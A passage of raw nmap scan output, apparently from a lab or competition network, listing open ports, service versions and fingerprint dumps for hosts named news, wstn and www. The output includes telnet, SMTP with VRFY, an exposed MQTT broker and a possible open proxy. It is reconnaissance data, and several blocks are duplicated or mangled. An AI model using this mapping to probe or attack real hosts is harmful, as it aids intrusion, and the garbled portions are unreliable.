|_Not valid after: 2035-08-28T21:36:15
|_smtp-commands: news.ad.iseage.org, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
79/tcp open finger?
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Disposition: inline;filename=f.txt
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| {"timestamp":"2025-10-04T14:43:18.288+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| {"timestamp":"2025-10-04T14:43:18.133+00:00","status":404,"error":"Not Found","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| {"timestamp":"2025-10-04T14:43:18.175+00:00","status":404,"error":"Not Found","path":"/"}
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| HTTP Status 400
| Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}HTTP Status 400
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=10/4%Time=68E132AE%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,11B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Ac
SF:cess-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers\
SF:r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2004\x20Oct\x202
SF:025\x2014:43:18\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"
SF:2025-10-04T14:43:18\.133\+00:00\",\"status\":404,\"error\":\"Not\x20Fou
SF:nd\",\"path\":\"/\"}")%r(HTTPOptions,11B,"HTTP/1\.1\x20404\x20\r\nVary:
SF:\x20Origin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Access
SF:-Control-Request-Headers\r\nContent-Type:\x20application/json\r\nDate:\
SF:x20Sat,\x2004\x20Oct\x202025\x2014:43:18\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n{\"timestamp\":\"2025-10-04T14:43:18\.175\+00:00\",\"status\":4
SF:04,\"error\":\"Not\x20Found\",\"path\":\"/\"}")%r(RTSPRequest,24E,"HTTP
SF:/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent
SF:-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Sat,\x2004\x20Oc
SF:t\x202025\x2014:43:18\x20GMT\r\nConnection:\x20close\r\n\r\nSF:20html>HTTP\x20Status\x20400\x20\xe2\
SF:x80\x93\x20Bad\x20Requestbody\x20{f
SF:ont-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{colo
SF:r:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20
SF:{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\
SF:x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D7
SF:6;border:none;}HTTP\x20Status\x20400\x20\xe2\x
")%r(FourOhFourRequest,16A,"
SF:HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Control-Requ
SF:est-Method\r\nVary:\x20Access-Control-Request-Headers\r\nContent-Dispos
SF:ition:\x20inline;filename=f\.txt\r\nContent-Type:\x20application/json\r
SF:\nDate:\x20Sat,\x2004\x20Oct\x202025\x2014:43:18\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n{\"timestamp\":\"2025-10-04T14:43:18\.288\+00:00\",\"st
SF:atus\":404,\"error\":\"Not\x20Found\",\"path\":\"/nice%20ports%2C/Tri%6
SF:Eity\.txt%2ebak\"}")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type
SF::\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Leng
SF:th:\x20435\r\nDate:\x20Sat,\x2004\x20Oct\x202025\x2014:43:18\x20GMT\r\n
SF:Connection:\x20close\r\n\r\nSF:d>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20RequestSF:>body\x20{font-family:Tahoma,Arial,sans-ser
SF:if;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76
SF:;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font
SF:-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line
SF:\x20{height:1px;background-color:#525D76;border:none;}SF:ody>
Service Info: Hosts: news, news.ad.iseage.org; OS: Linux; CPE: cpe:/o:linux:linux_kernel
21/tcp open ftp OpenBSD ftpd 6.4 (Linux port 0.17)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 35:79:94:a9:8d:d5:06:f3:5b:b6:c7:31:79:62:de:08 (RSA)
| 256 95:a6:a9:0f:80:04:10:e4:8b:a0:0b:68:6b:39:07:e8 (ECDSA)
|_ 256 95:78:e1:ee:dc:0e:f6:2b:a3:0d:dd:aa:e0:8f:a7:cd (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=news
| Subject Alternative Name: DNS:news
| Not valid before: 2025-08-30T21:36:15
|_Not valid after: 2035-08-28T21:36:15
|_smtp-commands: news.ad.iseage.org, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
79/tcp open finger?
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Disposition: inline;filename=f.txt
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| {"timestamp":"2025-10-04T14:43:18.288+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| {"timestamp":"2025-10-04T14:43:18.133+00:00","status":404,"error":"Not Found","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| {"timestamp":"2025-10-04T14:43:18.175+00:00","status":404,"error":"Not Found","path":"/"}
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sat, 04 Oct 2025 14:43:18 GMT
| Connection: close
| HTTP Status 400
| Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}
HTTP Status 400
|_ Request
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=10/4%Time=68E132AE%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,11B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Ac
SF:cess-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers\
SF:r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2004\x20Oct\x202
SF:025\x2014:43:18\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"
SF:2025-10-04T14:43:18\.133\+00:00\",\"status\":404,\"error\":\"Not\x20Fou
SF:nd\",\"path\":\"/\"}")%r(HTTPOptions,11B,"HTTP/1\.1\x20404\x20\r\nVary:
SF:\x20Origin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Access
SF:-Control-Request-Headers\r\nContent-Type:\x20application/json\r\nDate:\
SF:x20Sat,\x2004\x20Oct\x202025\x2014:43:18\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n{\"timestamp\":\"2025-10-04T14:43:18\.175\+00:00\",\"status\":4
SF:04,\"error\":\"Not\x20Found\",\"path\":\"/\"}")%r(RTSPRequest,24E,"HTTP
SF:/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent
SF:-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Sat,\x2004\x20Oc
SF:t\x202025\x2014:43:18\x20GMT\r\nConnection:\x20close\r\n\r\nSF:20html>HTTP\x20Status\x20400\x20\xe2\
SF:x80\x93\x20Bad\x20Requestbody\x20{f
SF:ont-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{colo
SF:r:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20
SF:{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\
SF:x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D7
SF:6;border:none;}
HTTP\x20Status\x20400\x20\xe2\x
SF:80\x93\x20Bad\x20Request
")%r(FourOhFourRequest,16A,"SF:HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Control-Requ
SF:est-Method\r\nVary:\x20Access-Control-Request-Headers\r\nContent-Dispos
SF:ition:\x20inline;filename=f\.txt\r\nContent-Type:\x20application/json\r
SF:\nDate:\x20Sat,\x2004\x20Oct\x202025\x2014:43:18\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n{\"timestamp\":\"2025-10-04T14:43:18\.288\+00:00\",\"st
SF:atus\":404,\"error\":\"Not\x20Found\",\"path\":\"/nice%20ports%2C/Tri%6
SF:Eity\.txt%2ebak\"}")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type
SF::\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Leng
SF:th:\x20435\r\nDate:\x20Sat,\x2004\x20Oct\x202025\x2014:43:18\x20GMT\r\n
SF:Connection:\x20close\r\n\r\nSF:d>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20RequestSF:>body\x20{font-family:Tahoma,Arial,sans-ser
SF:if;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76
SF:;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font
SF:-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line
SF:\x20{height:1px;background-color:#525D76;border:none;}SF:ody>
HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:ody>");Service Info: Hosts: news, news.ad.iseage.org; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
wstn
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:18:5d:f5:ed:78:64:cc:53:87:40:4b:b6:10:86:3a (RSA)
| 256 e4:74:12:60:41:a3:53:40:67:ee:ea:da:c5:42:e3:fd (ECDSA)
|_ 256 07:99:db:38:3a:fe:5a:ba:fc:5c:27:c9:ea:83:c3:c5 (ED25519)
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:18:5d:f5:ed:78:64:cc:53:87:40:4b:b6:10:86:3a (RSA)
| 256 e4:74:12:60:41:a3:53:40:67:ee:ea:da:c5:42:e3:fd (ECDSA)
|_ 256 07:99:db:38:3a:fe:5a:ba:fc:5c:27:c9:ea:83:c3:c5 (ED25519)
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
www
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a0:6a:89:c7:a4:b1:37:23:2d:3a:a1:24:c3:76:10:06 (ECDSA)
|_ 256 a8:7c:35:3d:df:2b:92:07:2b:1e:c8:5a:8d:d3:7e:0f (ED25519)
80/tcp open http Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
1883/tcp open mosquitto version 2.0.11
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/messages/received: 1
| $SYS/broker/load/bytes/sent/5min: 0.79
| $SYS/broker/load/sockets/15min: 0.14
| $SYS/broker/store/messages/bytes: 184
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/bytes/received: 20
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/version: mosquitto version 2.0.11
| $SYS/broker/uptime: 2054405 seconds
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/messages/sent: 1
| $SYS/broker/load/sockets/5min: 0.39
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/load/sockets/1min: 1.83
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/load/bytes/received/1min: 16.45
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/bytes/received/15min: 1.20
| $SYS/broker/heap/maximum: 42632
| $SYS/broker/load/connections/5min: 0.20
|_ $SYS/broker/load/messages/received/15min: 0.07
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| content-type: text/html;charset=utf-8
| x-powered-by: Nuxt
| Date: Sat, 04 Oct 2025 14:37:15 GMT
| Connection: close
| @layer base {
| :root {
| --ui-color-primary-50: var(--color-green-50, oklch(98.2% 0.018 155.826));
| --ui-color-primary-100: var(--color-green-100, oklch(96.2% 0.044 156.743));
| --ui-color-primary-200: var(--color-green-200, oklch(92.5% 0.084 155.995));
| --ui-color-primary-300: var(--color-green-300, oklch(87.1% 0.15 154.449));
| --ui-color-primary-400: var(--color-green-400, oklch(79.2% 0.209 151.711));
| --ui-color-primary-500: var(--color-green-500, oklch(72.3% 0.219 149.579));
| --ui-color-primary-600: var(--color-green-600, oklch(62.7% 0.194 149.214));
| --ui-color-primary-700: var(--color-green-700, oklch(
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">ht... :
SF-Port3000-TCP:V=7.94SVN%I=7%D=10/4%Time=68E13149%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,10F8,"HTTP/1\.1\x20200\x20OK\r\ncontent-type:\x20text/html;
SF:charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20Sat,\x2004\x20Oct\x2
SF:02025\x2014:37:15\x20GMT\r\nConnection:\x20close\r\n\r\nSF:ml>SF:0content=\"width=device-width,\x20initial-scale=1\">SF:-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{\n\x20\x20--ui-colo
SF:r-primary-50:\x20var\(--color-green-50,\x20oklch\(98\.2%\x200\.018\x201
SF:55\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var\(--color-green-100
SF:,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\x20--ui-color-prima
SF:ry-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\x200\.084\x20155\.9
SF:95\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--color-green-300,\x20
SF:oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--ui-color-primary-400
SF::\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.209\x20151\.711\)\)
SF:;\n\x20\x20--ui-color-primary-500:\x20var\(--color-green-500,\x20oklch\
SF:(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-color-primary-600:\x20
SF:var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x20149\.214\)\);\n\x
SF:20\x20--ui-color-primary-700:\x20var\(--color-green-700,\x20oklch\(")%r
SF:(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(HTTPOptions,1C48,"HTTP/1\.1\x20200\x20OK\r\ncontent-t
SF:ype:\x20text/html;charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20Sa
SF:t,\x2004\x20Oct\x202025\x2014:37:15\x20GMT\r\nConnection:\x20close\r\n\
SF:r\nSF:me=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\"><
SF:style\x20id=\"nuxt-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{\
SF:n\x20\x20--ui-color-primary-50:\x20var\(--color-green-50,\x20oklch\(98\
SF:.2%\x200\.018\x20155\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var\
SF:(--color-green-100,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\x
SF:20--ui-color-primary-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\x
SF:200\.084\x20155\.995\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--co
SF:lor-green-300,\x20oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--ui
SF:-color-primary-400:\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.2
SF:09\x20151\.711\)\);\n\x20\x20--ui-color-primary-500:\x20var\(--color-gr
SF:een-500,\x20oklch\(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-colo
SF:r-primary-600:\x20var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x2
SF:0149\.214\)\);\n\x20\x20--ui-color-primary-700:\x20var\(--color-green-7
SF:00,\x20oklch\(");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a0:6a:89:c7:a4:b1:37:23:2d:3a:a1:24:c3:76:10:06 (ECDSA)
|_ 256 a8:7c:35:3d:df:2b:92:07:2b:1e:c8:5a:8d:d3:7e:0f (ED25519)
80/tcp open http Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
1883/tcp open mosquitto version 2.0.11
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/messages/received: 1
| $SYS/broker/load/bytes/sent/5min: 0.79
| $SYS/broker/load/sockets/15min: 0.14
| $SYS/broker/store/messages/bytes: 184
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/bytes/received: 20
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/version: mosquitto version 2.0.11
| $SYS/broker/uptime: 2054405 seconds
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/messages/sent: 1
| $SYS/broker/load/sockets/5min: 0.39
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/load/sockets/1min: 1.83
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/load/bytes/received/1min: 16.45
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/bytes/received/15min: 1.20
| $SYS/broker/heap/maximum: 42632
| $SYS/broker/load/connections/5min: 0.20
|_ $SYS/broker/load/messages/received/15min: 0.07
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| content-type: text/html;charset=utf-8
| x-powered-by: Nuxt
| Date: Sat, 04 Oct 2025 14:37:15 GMT
| Connection: close
| @layer base {
| :root {
| --ui-color-primary-50: var(--color-green-50, oklch(98.2% 0.018 155.826));
| --ui-color-primary-100: var(--color-green-100, oklch(96.2% 0.044 156.743));
| --ui-color-primary-200: var(--color-green-200, oklch(92.5% 0.084 155.995));
| --ui-color-primary-300: var(--color-green-300, oklch(87.1% 0.15 154.449));
| --ui-color-primary-400: var(--color-green-400, oklch(79.2% 0.209 151.711));
| --ui-color-primary-500: var(--color-green-500, oklch(72.3% 0.219 149.579));
| --ui-color-primary-600: var(--color-green-600, oklch(62.7% 0.194 149.214));
| --ui-color-primary-700: var(--color-green-700, oklch(
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service">ht... :
SF-Port3000-TCP:V=7.94SVN%I=7%D=10/4%Time=68E13149%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,10F8,"HTTP/1\.1\x20200\x20OK\r\ncontent-type:\x20text/html;
SF:charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20Sat,\x2004\x20Oct\x2
SF:02025\x2014:37:15\x20GMT\r\nConnection:\x20close\r\n\r\nSF:ml>SF:0content=\"width=device-width,\x20initial-scale=1\">SF:-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{\n\x20\x20--ui-colo
SF:r-primary-50:\x20var\(--color-green-50,\x20oklch\(98\.2%\x200\.018\x201
SF:55\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var\(--color-green-100
SF:,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\x20--ui-color-prima
SF:ry-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\x200\.084\x20155\.9
SF:95\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--color-green-300,\x20
SF:oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--ui-color-primary-400
SF::\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.209\x20151\.711\)\)
SF:;\n\x20\x20--ui-color-primary-500:\x20var\(--color-green-500,\x20oklch\
SF:(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-color-primary-600:\x20
SF:var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x20149\.214\)\);\n\x
SF:20\x20--ui-color-primary-700:\x20var\(--color-green-700,\x20oklch\(")%r
SF:(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(HTTPOptions,1C48,"HTTP/1\.1\x20200\x20OK\r\ncontent-t
SF:ype:\x20text/html;charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20Sa
SF:t,\x2004\x20Oct\x202025\x2014:37:15\x20GMT\r\nConnection:\x20close\r\n\
SF:r\nSF:me=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\"><
SF:style\x20id=\"nuxt-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{\
SF:n\x20\x20--ui-color-primary-50:\x20var\(--color-green-50,\x20oklch\(98\
SF:.2%\x200\.018\x20155\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var\
SF:(--color-green-100,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\x
SF:20--ui-color-primary-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\x
SF:200\.084\x20155\.995\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--co
SF:lor-green-300,\x20oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--ui
SF:-color-primary-400:\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.2
SF:09\x20151\.711\)\);\n\x20\x20--ui-color-primary-500:\x20var\(--color-gr
SF:een-500,\x20oklch\(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-colo
SF:r-primary-600:\x20var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x2
SF:0149\.214\)\);\n\x20\x20--ui-color-primary-700:\x20var\(--color-green-7
SF:00,\x20oklch\(");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```